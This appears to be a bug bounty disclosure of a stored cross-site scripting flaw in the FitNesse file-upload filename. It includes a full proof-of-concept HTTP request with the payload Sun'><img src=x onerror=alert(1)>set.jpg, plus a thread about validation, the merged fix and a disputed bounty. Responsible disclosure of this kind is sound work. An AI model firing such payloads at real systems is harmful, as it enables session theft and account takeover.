Cross-site Scripting (XSS) - Stored in unclebob/fitnesse

Valid

Reported on

Sep 22nd 2021


Description

Stored XSS in FileName allows for arbitrary execution of JavaScript

Proof of Concept

// PoC Request
POST /files/ HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------82050748222730013181475300839
Content-Length: 71559
Origin: http://localhost:8081
Connection: close
Referer: http://localhost:8081/files/
Cookie: textwrapon=false; textautoformat=false; wysiwyg=textarea
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------82050748222730013181475300839
Content-Disposition: form-data; name="responder"

upload
-----------------------------82050748222730013181475300839
Content-Disposition: form-data; name="file"; filename="Sun'><img src=x onerror=alert(1)>set.jpg"
Content-Type: image/jpeg

ÿØÿàJFIF``ÿí
-----------------------------82050748222730013181475300839--

Step to reproduce

At Menu choose Tools > Files

Upload File with Filename contain payload: Sun'><img src=x onerror=alert(1)>set.jpg

Video PoC: PoC

Impact

This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 months ago
Ziding Zhang
2 months ago

Admin


Hey @noobpk, I've emailed the maintainers for you.

lethanhphuc
2 months ago

Researcher


@zidingz Ah. So you will update this report on behalf of the maintainers

We have contacted a member of the unclebob/fitnesse team and are waiting to hear back 2 months ago
unclebob validated this vulnerability 2 months ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
unclebob confirmed that a fix has been merged on cc7e58 2 months ago
The fix bounty has been dropped
lethanhphuc
2 months ago

Researcher


Hi, Is there any mistake in the bounty placed?? when i wrote the report it was 25$

lethanhphuc
2 months ago

Researcher


@admin Is it possible to review the bounty for this xss vulnerability??

Jamie Slome
2 months ago

Admin


@lethanhphuc - it looks like the maintainer selected this bounty when rewarding the report.

lethanhphuc
2 months ago

Researcher


@admin I think there should be suggestions about bounties for maintainers when they reward researchers. :(( 5$ is too little

Jamie Slome
2 months ago

Admin


If you would like to make a feature request, feel free to add it to our public roadmap.